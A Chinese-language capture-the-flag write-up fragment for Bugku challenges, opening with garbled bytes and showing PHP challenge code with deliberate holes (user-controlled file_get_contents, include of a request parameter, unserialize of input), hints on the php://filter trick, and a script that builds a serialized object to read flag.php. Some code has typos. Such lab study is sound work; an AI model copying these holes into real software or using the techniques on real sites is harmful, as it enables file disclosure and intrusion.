lʢܢڰ*'۩0{稛*m";if(!$_GET['id'])

{

       header('Location:hello.php?id=1');

       exit();

}

$id=$_GET['id'];

$a=$_GET['a'];

$b=$_GET['b'];

if(stripos($a,'.'))

{

       echo'no no no no no no no';

       return;

}

$data = @file_get_contents($a,'r');

if($data=="bugku is a niceplateform!" and $id==0 and strlen($b)>5 anderegi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)

{

       require("f4l2a3g.txt");

}

else

{

       print"never never never give up !!!";

}

?>

f4l2a3g.txt里，直接访问

welcome to bugkuctf

还是利用php伪协议

php://filter的妙用

https://www.leavesongs.com/PENETRATION/php-filter-magic.html

关于tostring方法http://blog.****.net/qq_28602957/article/details/52243046

读的index.php

<?php 

$txt = $_GET["txt"]; 

$file = $_GET["file"]; 

$password =$_GET["password"]; 

if(isset($txt)&&(file_get_contents($txt,'r')==="welcometo the bugkuctf")){ 

   echo "hello friend!<br>"; 

   if(preg_match("/flag/",$file)){

              echo"不能现在就给你flag哦";

       exit(); 

   }else{ 

       include($file);  

       $password = unserialize($password); 

       echo $password; 

   } 

}else{ 

   echo "you are not the number of bugku ! "; 

}  

运行的别人的php代码

<?php

class Flag{//flag.php

       publicfunction _tostring(){

              if(isset($this->file)){

                     echofile_get_contents($this->file);

                     echo"<br>";

                     return("good");

              }

       }

}

$a = new Flag();

$a->file="flag.php";

print_r(serialize($a));

?>

过狗

打开什么都没有，寻找返回文件名或目录的函数

http://www.w3school.com.cn/php/func_filesystem_glob.asp

直接读flag.txt